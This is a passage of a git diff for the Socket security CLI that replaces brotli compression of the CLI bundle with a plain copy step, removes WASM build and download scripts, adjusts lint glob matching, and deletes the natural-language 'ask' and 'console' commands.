Check if Taffy supports the feature -3. Write test following existing patterns -4. Run test and verify expected behavior -5. Add expected failure annotation if unsupported - -### Fixing Failing Tests - -1. Identify root cause (our bug vs Taffy limitation) -2. If our bug: Fix in Rust or adapter layer -3. If Taffy limitation: Document and mark as expected failure -4. Add regression test to prevent reoccurrence - -### Test Guidelines - -- **One assertion per test**: Makes failures easier to diagnose -- **Descriptive names**: Follow Yoga's naming convention -- **Cleanup resources**: Always call `freeRecursive()` in finally block -- **Epsilon comparison**: Use `expectClose()` for floating-point -- **Document skipped tests**: Explain why test is skipped with reference diff --git a/package.json b/package.json index 9dc95aa98..f94b05b1b 100644 --- a/package.json +++ b/package.json @@ -54,7 +54,6 @@ "@types/yargs-parser": "catalog:", "@typescript-eslint/parser": "catalog:", "@vitest/coverage-v8": "catalog:", - "@yao-pkg/pkg": "catalog:", "browserslist": "catalog:", "chalk-table": "catalog:", "cmd-shim": "catalog:", @@ -170,7 +169,6 @@ "build:binaries": "node scripts/build-binaries.mjs", "build:binaries:dev": "node scripts/build-binaries.mjs --dev", "build:sea": "node scripts/build-binaries.mjs --sea", - "build:smol": "node scripts/build-binaries.mjs --smol", "build:wasm": "node scripts/build-binaries.mjs --wasm", "dev": "pnpm run build:watch", "// Quality Checks": "", @@ -191,12 +189,9 @@ "cover": "pnpm --filter @socketsecurity/cli run test:unit:coverage --", "cover:all": "pnpm --filter \"./packages/**\" run cover", "// WASM": "", - "wasm:benchmark": "node scripts/wasm/benchmark-build.mjs", - "wasm:build": "node scripts/wasm/build-unified-wasm.mjs", - "wasm:build:dev": "node scripts/wasm/build-unified-wasm.mjs --dev", - "wasm:optimize": "node scripts/wasm/optimize-embedded-wasm.mjs", - "wasm:optimize:aggressive": "node scripts/wasm/optimize-embedded-wasm.mjs --aggressive", 
- "wasm:setup": "node scripts/wasm/setup-build-env.mjs", + "wasm:extract": "node scripts/wasm/extract-yoga.mjs", + "wasm:optimize": "node scripts/wasm/optimize-yoga.mjs", + "wasm:optimize:aggressive": "node scripts/wasm/optimize-yoga.mjs --aggressive", "// Maintenance": "", "clean": "pnpm --filter \"./packages/**\" run clean", "clean:cache": "node scripts/clean-cache.mjs", diff --git a/packages/cli-with-sentry/.config/esbuild.index.config.mjs b/packages/cli-with-sentry/.config/esbuild.index.config.mjs index 7b576b07a..f3b91305d 100644 --- a/packages/cli-with-sentry/.config/esbuild.index.config.mjs +++ b/packages/cli-with-sentry/.config/esbuild.index.config.mjs @@ -1,6 +1,6 @@ /** * esbuild configuration for Socket CLI with Sentry index loader. - * Builds the brotli decompression loader that executes the compressed CLI. + * Builds the loader that executes the CLI bundle. */ import path from 'node:path' diff --git a/packages/cli-with-sentry/scripts/build.mjs b/packages/cli-with-sentry/scripts/build.mjs index ea218c962..052da82a0 100644 --- a/packages/cli-with-sentry/scripts/build.mjs +++ b/packages/cli-with-sentry/scripts/build.mjs @@ -61,17 +61,17 @@ async function main() { } logger.success('Built shadow npm inject') - // Compress CLI. - logger.info('Compressing CLI...') - result = await spawn('node', ['scripts/compress-cli.mjs'], { + // Copy CLI to dist. + logger.info('Copying CLI to dist...') + result = await spawn('node', ['scripts/copy-cli.mjs'], { shell: WIN32, stdio: 'inherit', cwd: rootPath, }) if (result.code !== 0) { - throw new Error(`CLI compression failed with exit code ${result.code}`) + throw new Error(`CLI copy failed with exit code ${result.code}`) } - logger.success('Compressed CLI') + logger.success('Copied CLI to dist') // Copy data directory from packages/cli. 
logger.info('Copying data/ from packages/cli...') diff --git a/packages/cli-with-sentry/scripts/compress-cli.mjs b/packages/cli-with-sentry/scripts/compress-cli.mjs deleted file mode 100644 index af9fae085..000000000 --- a/packages/cli-with-sentry/scripts/compress-cli.mjs +++ /dev/null @@ -1,52 +0,0 @@ -/** - * @fileoverview Compress build/cli.js with brotli to dist/cli.js.bz. - * - * This script compresses the CLI bundle to reduce npm package size - * from ~13MB to ~1.7MB (87% reduction). - * - * The compressed file is decompressed at runtime by dist/index.js. - */ - -import { mkdirSync, readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') -const buildPath = path.join(rootPath, 'build') -const distPath = path.join(rootPath, 'dist') - -const cliPath = path.join(buildPath, 'cli.js') -const cliBzPath = path.join(distPath, 'cli.js.bz') - -const logger = getDefaultLogger() -logger.log('') -logger.step('Compressing CLI with brotli...') - -// Ensure dist/ directory exists. -mkdirSync(distPath, { recursive: true }) - -// Read the uncompressed CLI from build/. -const cliCode = readFileSync(cliPath) -const originalSize = cliCode.length - -// Compress with brotli (max quality for best compression). -const compressed = brotliCompressSync(cliCode, { - params: { - [0]: 11, // BROTLI_PARAM_QUALITY: 11 (max quality). - }, -}) -const compressedSize = compressed.length - -// Write compressed file to dist/. 
-writeFileSync(cliBzPath, compressed) - -const compressionRatio = ((1 - compressedSize / originalSize) * 100).toFixed(1) -logger.success( - `Compressed: ${(originalSize / 1024 / 1024).toFixed(2)} MB → ${(compressedSize / 1024 / 1024).toFixed(2)} MB (${compressionRatio}% reduction)`, -) - -logger.log('') diff --git a/packages/cli-with-sentry/scripts/copy-cli.mjs b/packages/cli-with-sentry/scripts/copy-cli.mjs new file mode 100644 index 000000000..b9e5e1716 --- /dev/null +++ b/packages/cli-with-sentry/scripts/copy-cli.mjs @@ -0,0 +1,29 @@ +/** + * @fileoverview Copy build/cli.js to dist/cli.js. + * + * This script copies the CLI bundle from the build directory to dist. + */ + +import { copyFileSync, mkdirSync } from 'node:fs' +import path from 'node:path' +import { fileURLToPath } from 'node:url' + +import { getDefaultLogger } from '@socketsecurity/lib/logger' + +const __dirname = path.dirname(fileURLToPath(import.meta.url)) +const rootPath = path.join(__dirname, '..') +const buildPath = path.join(rootPath, 'build') +const distPath = path.join(rootPath, 'dist') + +const cliPath = path.join(buildPath, 'cli.js') +const distCliPath = path.join(distPath, 'cli.js') + +const logger = getDefaultLogger() + +// Ensure dist/ directory exists. +mkdirSync(distPath, { recursive: true }) + +// Copy cli.js to dist/. +copyFileSync(cliPath, distCliPath) + +logger.success('Copied cli.js to dist/') diff --git a/packages/cli-with-sentry/scripts/verify-package.mjs b/packages/cli-with-sentry/scripts/verify-package.mjs index 2ee46009f..4d7433daf 100644 --- a/packages/cli-with-sentry/scripts/verify-package.mjs +++ b/packages/cli-with-sentry/scripts/verify-package.mjs @@ -85,7 +85,7 @@ async function validate() { } // Check dist files exist and validate Sentry integration. 
- const distFiles = ['index.js', 'cli.js.bz', 'shadow-npm-inject.js'] + const distFiles = ['index.js', 'cli.js', 'shadow-npm-inject.js'] for (const file of distFiles) { logger.info(`Checking dist/${file}...`) const filePath = path.join(packageRoot, 'dist', file) diff --git a/packages/cli/.config/esbuild.index.config.mjs b/packages/cli/.config/esbuild.index.config.mjs index 574dbba39..f0d84f0e8 100644 --- a/packages/cli/.config/esbuild.index.config.mjs +++ b/packages/cli/.config/esbuild.index.config.mjs @@ -1,6 +1,6 @@ /** * esbuild configuration for Socket CLI index loader. - * Builds the brotli decompression loader that executes the compressed CLI. + * Builds the loader that executes the CLI bundle. */ import path from 'node:path' diff --git a/packages/cli/scripts/build.mjs b/packages/cli/scripts/build.mjs index 9fafb5b8d..47d412462 100644 --- a/packages/cli/scripts/build.mjs +++ b/packages/cli/scripts/build.mjs @@ -179,9 +179,9 @@ async function main() { args: ['.config/esbuild.inject.config.mjs'], }, { - name: 'Compress CLI', + name: 'Copy CLI to Dist', command: 'node', - args: ['scripts/compress-cli.mjs'], + args: ['scripts/copy-cli.mjs'], }, ] diff --git a/packages/cli/scripts/check.mjs b/packages/cli/scripts/check.mjs index be121da94..9844a3e62 100644 --- a/packages/cli/scripts/check.mjs +++ b/packages/cli/scripts/check.mjs @@ -7,7 +7,10 @@ import { parseArgs } from '@socketsecurity/lib-external/argv/parse' import { WIN32 } from '@socketsecurity/lib-external/constants/platform' import { getDefaultLogger } from '@socketsecurity/lib-external/logger' import { spawn } from '@socketsecurity/lib-external/spawn' -import { printFooter, printHeader } from '@socketsecurity/lib-external/stdio/header' +import { + printFooter, + printHeader, +} from '@socketsecurity/lib-external/stdio/header' const logger = getDefaultLogger() diff --git a/packages/cli/scripts/compress-cli.mjs b/packages/cli/scripts/compress-cli.mjs deleted file mode 100644 index 6d04be226..000000000 --- 
a/packages/cli/scripts/compress-cli.mjs +++ /dev/null @@ -1,52 +0,0 @@ -/** - * @fileoverview Compress build/cli.js with brotli to dist/cli.js.bz. - * - * This script compresses the CLI bundle to reduce npm package size - * from ~13MB to ~1.7MB (87% reduction). - * - * The compressed file is decompressed at runtime by dist/index.js. - */ - -import { mkdirSync, readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -import { getDefaultLogger } from '@socketsecurity/lib-external/logger' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') -const buildPath = path.join(rootPath, 'build') -const distPath = path.join(rootPath, 'dist') - -const cliPath = path.join(buildPath, 'cli.js') -const cliBzPath = path.join(distPath, 'cli.js.bz') - -const logger = getDefaultLogger() -logger.log('') -logger.step('Compressing CLI with brotli...') - -// Ensure dist/ directory exists. -mkdirSync(distPath, { recursive: true }) - -// Read the uncompressed CLI from build/. -const cliCode = readFileSync(cliPath) -const originalSize = cliCode.length - -// Compress with brotli (max quality for best compression). -const compressed = brotliCompressSync(cliCode, { - params: { - [0]: 11, // BROTLI_PARAM_QUALITY: 11 (max quality). - }, -}) -const compressedSize = compressed.length - -// Write compressed file to dist/. 
-writeFileSync(cliBzPath, compressed) - -const compressionRatio = ((1 - compressedSize / originalSize) * 100).toFixed(1) -logger.success( - `Compressed: ${(originalSize / 1024 / 1024).toFixed(2)} MB → ${(compressedSize / 1024 / 1024).toFixed(2)} MB (${compressionRatio}% reduction)`, -) - -logger.log('') diff --git a/packages/cli/scripts/copy-cli.mjs b/packages/cli/scripts/copy-cli.mjs new file mode 100644 index 000000000..58303dcea --- /dev/null +++ b/packages/cli/scripts/copy-cli.mjs @@ -0,0 +1,29 @@ +/** + * @fileoverview Copy build/cli.js to dist/cli.js. + * + * This script copies the CLI bundle from the build directory to dist. + */ + +import { copyFileSync, mkdirSync } from 'node:fs' +import path from 'node:path' +import { fileURLToPath } from 'node:url' + +import { getDefaultLogger } from '@socketsecurity/lib-external/logger' + +const __dirname = path.dirname(fileURLToPath(import.meta.url)) +const rootPath = path.join(__dirname, '..') +const buildPath = path.join(rootPath, 'build') +const distPath = path.join(rootPath, 'dist') + +const cliPath = path.join(buildPath, 'cli.js') +const distCliPath = path.join(distPath, 'cli.js') + +const logger = getDefaultLogger() + +// Ensure dist/ directory exists. +mkdirSync(distPath, { recursive: true }) + +// Copy cli.js to dist/. +copyFileSync(cliPath, distCliPath) + +logger.success('Copied cli.js to dist/') diff --git a/packages/cli/scripts/cover.mjs b/packages/cli/scripts/cover.mjs index fa215a0b2..e235968dc 100644 --- a/packages/cli/scripts/cover.mjs +++ b/packages/cli/scripts/cover.mjs @@ -26,9 +26,7 @@ const logger = getDefaultLogger() * Print a header message. 
*/ function printHeader(message) { - logger.error( - '\n═══════════════════════════════════════════════════════', - ) + logger.error('\n═══════════════════════════════════════════════════════') logger.error(` ${message}`) logger.error('═══════════════════════════════════════════════════════\n') } diff --git a/packages/cli/scripts/lint.mjs b/packages/cli/scripts/lint.mjs index 60a18ca7d..3b3bad876 100644 --- a/packages/cli/scripts/lint.mjs +++ b/packages/cli/scripts/lint.mjs @@ -9,7 +9,10 @@ import path from 'node:path' import { isQuiet } from '@socketsecurity/lib-external/argv/flags' import { parseArgs } from '@socketsecurity/lib-external/argv/parse' import { WIN32 } from '@socketsecurity/lib-external/constants/platform' -import { getChangedFiles, getStagedFiles } from '@socketsecurity/lib-external/git' +import { + getChangedFiles, + getStagedFiles, +} from '@socketsecurity/lib-external/git' import { getDefaultLogger } from '@socketsecurity/lib-external/logger' import { spawn } from '@socketsecurity/lib-external/spawn' import { printHeader } from '@socketsecurity/lib-external/stdio/header' @@ -42,25 +45,42 @@ const CONFIG_PATTERNS = [ */ function getBiomeExcludePatterns() { try { - const biomeConfigPath = path.join(process.cwd(), 'biome.json') - if (!existsSync(biomeConfigPath)) { + // Look for biome.json in current directory or parent directories. + let currentDir = process.cwd() + let biomeConfigPath = null + + // Search up to 3 levels up for biome.json. + for (let i = 0; i < 3; i++) { + const testPath = path.join(currentDir, 'biome.json') + if (existsSync(testPath)) { + biomeConfigPath = testPath + break + } + const parentDir = path.dirname(currentDir) + if (parentDir === currentDir) { + break + } + currentDir = parentDir + } + + if (!biomeConfigPath) { return [] } const biomeConfig = JSON.parse(readFileSync(biomeConfigPath, 'utf8')) const includes = biomeConfig['files']?.['includes'] ?? [] - // Extract patterns that start with '!' 
(exclude patterns) + // Extract patterns that start with '!' (exclude patterns). return ( includes .filter( pattern => typeof pattern === 'string' && pattern.startsWith('!'), ) - // Remove the '!' prefix + // Remove the '!' prefix. .map(pattern => pattern.slice(1)) ) } catch { - // If we can't read biome.json, return empty array + // If we can't read biome.json, return empty array. return [] } } @@ -70,15 +90,17 @@ function getBiomeExcludePatterns() { */ function isExcludedByBiome(file, excludePatterns) { for (const pattern of excludePatterns) { - // Convert glob pattern to regex-like matching - // Support **/ for directory wildcards and * for filename wildcards + // Convert glob pattern to regex-like matching. + // Support **/ for directory wildcards and * for filename wildcards. const regexPattern = pattern - // **/ matches any directory - .replace(/\*\*\//g, '.*') - // * matches any characters except / - .replace(/\*/g, '[^/]*') - // Escape dots + // Replace **/ with placeholder to avoid * being replaced later. + .replace(/\*\*\//g, '__SOCKETCLI_GLOBSTAR__') + // Escape dots for literal matching. .replace(/\./g, '\\.') + // * matches any characters except /. + .replace(/\*/g, '[^/]*') + // Replace placeholder with regex that matches any path or nothing. + .replace(/__SOCKETCLI_GLOBSTAR__/g, '(?:.*/)?') const regex = new RegExp(`^${regexPattern}$`) if (regex.test(file)) { diff --git a/packages/cli/scripts/verify-package.mjs b/packages/cli/scripts/verify-package.mjs index 18bb02519..55ab835af 100644 --- a/packages/cli/scripts/verify-package.mjs +++ b/packages/cli/scripts/verify-package.mjs @@ -77,7 +77,7 @@ async function validate() { } // Check dist files exist. 
- const distFiles = ['index.js', 'cli.js.bz', 'shadow-npm-inject.js'] + const distFiles = ['index.js', 'cli.js', 'shadow-npm-inject.js'] for (const file of distFiles) { logger.info(`Checking dist/${file}...`) const filePath = path.join(packageRoot, 'dist', file) diff --git a/packages/cli/scripts/wasm.mjs b/packages/cli/scripts/wasm.mjs deleted file mode 100644 index ff8ce5b6b..000000000 --- a/packages/cli/scripts/wasm.mjs +++ /dev/null @@ -1,355 +0,0 @@ -/** - * Socket CLI WASM Bundle Manager - * - * Unified script for building and downloading the unified WASM bundle - * containing all AI models (MiniLM, CodeT5 encoder/decoder, ONNX Runtime, Yoga). - * - * COMMANDS: - * - --build: Build WASM bundle from source (requires Python, Rust, wasm-pack) - * - --dev: Fast dev build (3-5x faster, use with --build) - * - --download: Download pre-built WASM bundle from GitHub releases - * - --help: Show this help message - * - * USAGE: - * node scripts/wasm.mjs --build # Production build - * node scripts/wasm.mjs --build --dev # Fast dev build - * node scripts/wasm.mjs --download - * node scripts/wasm.mjs --help - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { getDefaultLogger } from '@socketsecurity/lib-external/logger' -import { spawn } from '@socketsecurity/lib-external/spawn' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') -const externalDir = path.join(rootPath, 'external') -const outputFile = path.join(externalDir, 'socket-ai-sync.mjs') - -const GITHUB_REPO = 'SocketDev/socket-cli' -const WASM_ASSET_NAME = 'socket-ai-sync.mjs' - -/** - * Check Node.js version requirement. 
- */ -function checkNodeVersion() { - const nodeVersion = process.versions.node - const major = Number.parseInt(nodeVersion.split('.')[0], 10) - - if (major < 18) { - const logger = getDefaultLogger() - logger.error(' Node.js version 18 or higher is required') - logger.error(`Current version: ${nodeVersion}`) - logger.error('Please upgrade: https://nodejs.org/') - process.exit(1) - } -} - -/** - * Show help message. - */ -function showHelp() { - logger.info(` -╔═══════════════════════════════════════════════════╗ -║ Socket CLI WASM Bundle Manager ║ -╚═══════════════════════════════════════════════════╝ - -Commands: - --build Build WASM bundle from source - Requirements: Python 3.8+, Rust, wasm-pack, binaryen - Time: ~10-20 minutes (first run), ~5 minutes (subsequent) - Size: ~115MB output - - --dev Fast dev build (use with --build) - Optimizations: Minimal (opt-level=1, no LTO) - Time: ~2-5 minutes (3-5x faster than production) - Size: Similar to production (stripped) - - --download Download pre-built WASM bundle from GitHub releases - Requirements: Internet connection - Time: ~1-2 minutes - Size: ~115MB download - - --help Show this help message - -Usage: - node scripts/wasm.mjs --build # Production build - node scripts/wasm.mjs --build --dev # Fast dev build - node scripts/wasm.mjs --download - node scripts/wasm.mjs --help - -Examples: - # Build from source for production - node scripts/wasm.mjs --build - - # Fast dev build for iteration (3-5x faster) - node scripts/wasm.mjs --build --dev - - # Download pre-built bundle (for quick setup) - node scripts/wasm.mjs --download - -Optimizations: - - Cargo profiles: dev-wasm (fast) vs release (optimized) - - Thin LTO: 5-10% faster builds than full LTO - - Strip symbols: 5-10% size reduction - - wasm-opt -Oz: 5-15% additional size reduction - - Brotli compression: ~70% final size reduction - -Notes: - - The WASM bundle contains all AI models with INT4 quantization - - INT4 provides 50% size reduction with only 1-2% 
quality loss - - Output location: external/socket-ai-sync.mjs (~115MB) -`) -} - -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - if (result.code !== 0) { - throw new Error(`Command failed with exit code ${result.code}`) - } - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -/** - * Build WASM bundle from source. - */ -async function buildWasm() { - const isDev = process.argv.includes('--dev') - - logger.info('╔═══════════════════════════════════════════════════╗') - if (isDev) { - logger.info('║ Building WASM Bundle (Dev Mode) ║') - logger.info('║ 3-5x faster builds with minimal optimization ║') - } else { - logger.info('║ Building WASM Bundle from Source ║') - } - logger.info('╚═══════════════════════════════════════════════════╝\n') - - const convertScript = path.join(__dirname, 'wasm', 'convert-codet5.mjs') - const buildScript = path.join(__dirname, 'wasm', 'build-unified-wasm.mjs') - - // Step 1: Convert CodeT5 models to INT4. - logger.info('Step 1: Converting CodeT5 models to ONNX INT4...\n') - try { - await exec('node', [convertScript], { stdio: 'inherit' }) - } catch (e) { - logger.error('\n❌ CodeT5 conversion failed') - logger.error(`Error: ${e.message}`) - process.exit(1) - } - - // Step 2: Build unified WASM bundle. - logger.info('\nStep 2: Building unified WASM bundle...\n') - try { - const buildArgs = [buildScript] - if (isDev) { - buildArgs.push('--dev') - } - await exec('node', buildArgs, { stdio: 'inherit' }) - } catch (e) { - logger.error('\n❌ WASM bundle build failed') - logger.error(`Error: ${e.message}`) - process.exit(1) - } - - // Verify output file exists. 
- if (!existsSync(outputFile)) { - logger.error(`\n❌ Output file not found: ${outputFile}`) - process.exit(1) - } - - const stats = await fs.stat(outputFile) - logger.info('\n╔═══════════════════════════════════════════════════╗') - logger.info('║ Build Complete ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - logger.done(' WASM bundle built successfully') - logger.info(`✓ Output: ${outputFile}`) - logger.info(`✓ Size: ${(stats.size / 1024 / 1024).toFixed(2)} MB\n`) -} - -/** - * Get latest WASM build release from GitHub. - */ -async function getLatestWasmRelease() { - logger.info('📡 Fetching latest WASM build from GitHub...\n') - - try { - const apiUrl = `https://api.github.com/repos/${GITHUB_REPO}/releases` - const response = await fetch(apiUrl, { - headers: { - Accept: 'application/vnd.github+json', - 'User-Agent': 'socket-cli-wasm-downloader', - }, - }) - - if (!response.ok) { - throw new Error(`GitHub API request failed: ${response.statusText}`) - } - - const releases = await response.json() - - // Find the latest WASM build release (tagged with wasm-build-*). - const wasmRelease = releases.find(r => r.tag_name.startsWith('wasm-build-')) - - if (!wasmRelease) { - throw new Error('No WASM build releases found') - } - - // Find the asset. - const asset = wasmRelease.assets.find(a => a.name === WASM_ASSET_NAME) - - if (!asset) { - throw new Error( - `Asset "${WASM_ASSET_NAME}" not found in release ${wasmRelease.tag_name}`, - ) - } - - return { - asset, - name: wasmRelease.name, - tagName: wasmRelease.tag_name, - url: asset.browser_download_url, - } - } catch (e) { - logger.error(' Failed to fetch release information') - logger.error(`Error: ${e.message}`) - logger.error('\nTry building from source instead:') - logger.error('node scripts/wasm.mjs --build\n') - process.exit(1) - } -} - -/** - * Download file with progress. 
- */ -async function downloadFile(url, outputPath, expectedSize) { - logger.progress(' Downloading from GitHub...') - logger.substep(`URL: ${url}`) - logger.substep(`Size: ${(expectedSize / 1024 / 1024).toFixed(2)} MB\n`) - - try { - const response = await fetch(url, { - headers: { - Accept: 'application/octet-stream', - 'User-Agent': 'socket-cli-wasm-downloader', - }, - }) - - if (!response.ok) { - throw new Error(`Download failed: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - await fs.writeFile(outputPath, Buffer.from(buffer)) - - const stats = await fs.stat(outputPath) - logger.info(`✓ Downloaded ${(stats.size / 1024 / 1024).toFixed(2)} MB`) - logger.info(`✓ Saved to ${outputPath}\n`) - } catch (e) { - logger.error(' Download failed') - logger.error(`Error: ${e.message}`) - logger.error('\nTry building from source instead:') - logger.error('node scripts/wasm.mjs --build\n') - process.exit(1) - } -} - -/** - * Download pre-built WASM bundle from GitHub releases. - */ -async function downloadWasm() { - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Downloading Pre-built WASM Bundle ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - - // Check if output file already exists. - if (existsSync(outputFile)) { - const stats = await fs.stat(outputFile) - logger.warn(' WASM bundle already exists:') - logger.substep(`${outputFile}`) - logger.substep(`Size: ${(stats.size / 1024 / 1024).toFixed(2)} MB\n`) - - // Ask user if they want to overwrite (simple y/n). - logger.info('Overwrite? (y/N): ') - const answer = await new Promise(resolve => { - process.stdin.once('data', data => { - resolve(data.toString().trim().toLowerCase()) - }) - }) - - if (answer !== 'y' && answer !== 'yes') { - logger.info('\n✓ Keeping existing file\n') - return - } - - logger.info() - } - - // Get latest release info. 
- const release = await getLatestWasmRelease() - logger.info(`✓ Found release: ${release.name}`) - logger.substep(`Tag: ${release.tagName}\n`) - - // Ensure output directory exists. - await fs.mkdir(externalDir, { recursive: true }) - - // Download the file. - await downloadFile(release.url, outputFile, release.asset.size) - - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Download Complete ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - logger.done(' WASM bundle downloaded successfully') - logger.info(`✓ Output: ${outputFile}\n`) -} - -/** - * Main entry point. - */ -async function main() { - // Check Node.js version first. - checkNodeVersion() - - const args = process.argv.slice(2) - - if (args.length === 0 || args.includes('--help') || args.includes('-h')) { - showHelp() - return - } - - if (args.includes('--build')) { - await buildWasm() - return - } - - if (args.includes('--download')) { - await downloadWasm() - return - } - - logger.error(' Unknown command\n') - showHelp() - process.exit(1) -} - -main().catch(e => { - logger.error(' Unexpected error:', e) - process.exit(1) -}) diff --git a/packages/cli/src/commands.mts b/packages/cli/src/commands.mts index 895914e44..254804d9c 100755 --- a/packages/cli/src/commands.mts +++ b/packages/cli/src/commands.mts @@ -1,11 +1,9 @@ #!/usr/bin/env node import { cmdAnalytics } from './commands/analytics/cmd-analytics.mts' -import { cmdAsk } from './commands/ask/cmd-ask.mts' import { cmdAuditLog } from './commands/audit-log/cmd-audit-log.mts' import { cmdCI } from './commands/ci/cmd-ci.mts' import { cmdConfig } from './commands/config/cmd-config.mts' -import { cmdConsole } from './commands/console/cmd-console.mts' import { cmdFix } from './commands/fix/cmd-fix.mts' import { cmdInstall } from './commands/install/cmd-install.mts' import { cmdJson } from './commands/json/cmd-json.mts' @@ -39,12 +37,10 @@ import { isSeaBinary } from './utils/sea/detect.mts' 
export const rootCommands = { analytics: cmdAnalytics, - ask: cmdAsk, 'audit-log': cmdAuditLog, ci: cmdCI, cdxgen: cmdManifestCdxgen, config: cmdConfig, - console: cmdConsole, dependencies: cmdOrganizationDependencies, fix: cmdFix, install: cmdInstall, diff --git a/packages/cli/src/commands/ask/cmd-ask.mts b/packages/cli/src/commands/ask/cmd-ask.mts deleted file mode 100644 index 67194fbff..000000000 --- a/packages/cli/src/commands/ask/cmd-ask.mts +++ /dev/null @@ -1,98 +0,0 @@ -import { handleAsk } from './handle-ask.mts' -import { commonFlags } from '../../flags.mts' -import { meowOrExit } from '../../utils/cli/with-subcommands.mjs' -import { InputError } from '../../utils/error/errors.mjs' -import { - getFlagApiRequirementsOutput, - getFlagListOutput, -} from '../../utils/output/formatting.mts' - -import type { - CliCommandConfig, - CliCommandContext, -} from '../../utils/cli/with-subcommands.mjs' - -export const CMD_NAME = 'ask' - -const description = 'Ask in plain English' - -const hidden = false - -export const cmdAsk = { - description, - hidden, - run, -} - -async function run( - argv: string[] | readonly string[], - importMeta: ImportMeta, - { parentName }: CliCommandContext, -): Promise { - const config: CliCommandConfig = { - commandName: CMD_NAME, - description, - hidden, - flags: { - ...commonFlags, - execute: { - type: 'boolean', - shortFlag: 'e', - default: false, - description: 'Execute the command directly', - }, - explain: { - type: 'boolean', - default: false, - description: 'Show detailed explanation', - }, - }, - help: (command, config) => ` - Usage - $ ${command} "" [options] - - API Token Requirements - ${getFlagApiRequirementsOutput(`${parentName}:${CMD_NAME}`)} - - Options - ${getFlagListOutput(config.flags)} - - Examples - $ ${command} "scan for vulnerabilities" - $ ${command} "is express safe to use" - $ ${command} "fix critical issues" --execute - $ ${command} "show production vulnerabilities" --explain - $ ${command} "optimize my 
dependencies" - - Tips - - Be specific about what you want - - Mention "production" or "dev" to filter - - Use severity levels: critical, high, medium, low - - Say "dry run" to preview changes - `, - } - - const cli = meowOrExit({ - argv, - config, - importMeta, - parentName, - }) - - const query = cli.input[0] - - if (!query) { - throw new InputError( - 'Please provide a question.\n\nExample: socket ask "scan for vulnerabilities"', - ) - } - - const execute = !!cli.flags['execute'] - const explain = !!cli.flags['explain'] - - await handleAsk({ - query, - execute, - explain, - }) -} diff --git a/packages/cli/src/commands/ask/handle-ask.mts b/packages/cli/src/commands/ask/handle-ask.mts deleted file mode 100644 index 34d1e752e..000000000 --- a/packages/cli/src/commands/ask/handle-ask.mts +++ /dev/null @@ -1,666 +0,0 @@ -import { promises as fs } from 'node:fs' -import path from 'node:path' - -import nlp from 'compromise' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' -// Import compromise for NLP text normalization. - -import { outputAskCommand } from './output-ask.mts' -import ENV from '../../constants/env.mts' -const logger = getDefaultLogger() - -// Semantic index for fast word-overlap matching (lazy-loaded, ~3KB). -let semanticIndex: any = null - -// ONNX embedding pipeline for deep semantic matching (lazy-loaded, ~17MB model). -const embeddingPipeline: any = null -let embeddingPipelineFailure = false -const commandEmbeddings: Record = {} - -// Confidence thresholds. -const WORD_OVERLAP_THRESHOLD = 0.3 // Minimum for word overlap match. -const PATTERN_MATCH_THRESHOLD = 0.6 // If below this, try ONNX fallback. 
- -export interface HandleAskOptions { - query: string - execute: boolean - explain: boolean -} - -export interface ParsedIntent { - action: string - command: string[] - confidence: number - explanation: string - packageName?: string - severity?: string - environment?: string - isDryRun?: boolean -} - -/** - * Pattern matching rules for natural language. - */ -const PATTERNS = { - __proto__: null, - // Fix patterns (highest priority - action words). - fix: { - keywords: ['fix', 'resolve', 'repair', 'remediate', 'update', 'upgrade'], - command: ['fix'], - explanation: 'Applying package updates to fix GitHub security alerts', - priority: 3, - }, - // Patch patterns (high priority - specific action). - patch: { - keywords: ['patch', 'apply patch'], - command: ['patch'], - explanation: 'Directly patching code to remove CVEs', - priority: 3, - }, - // Optimize patterns (high priority - action words). - optimize: { - keywords: [ - 'optimize', - 'enhance', - 'improve', - 'replace', - 'alternative', - 'better', - ], - command: ['optimize'], - explanation: 'Replacing dependencies with Socket registry alternatives', - priority: 3, - }, - // Package safety patterns (medium priority). - package: { - keywords: [ - 'safe', - 'trust', - 'score', - 'rating', - 'quality', - 'package', - 'dependency', - ], - command: ['package', 'score'], - explanation: 'Checking package security score', - priority: 2, - }, - // Scan patterns (medium priority). - scan: { - keywords: [ - 'scan', - 'check', - 'vulnerabilit', - 'audit', - 'analyze', - 'inspect', - 'review', - ], - command: ['scan', 'create'], - explanation: 'Scanning your project for security vulnerabilities', - priority: 2, - }, - // Issues patterns (lowest priority - descriptive words). - issues: { - keywords: ['problem', 'alert', 'warning', 'concern'], - command: ['scan', 'create'], - explanation: 'Finding issues in your dependencies', - priority: 1, - }, -} as const - -/** - * Severity levels mapping. 
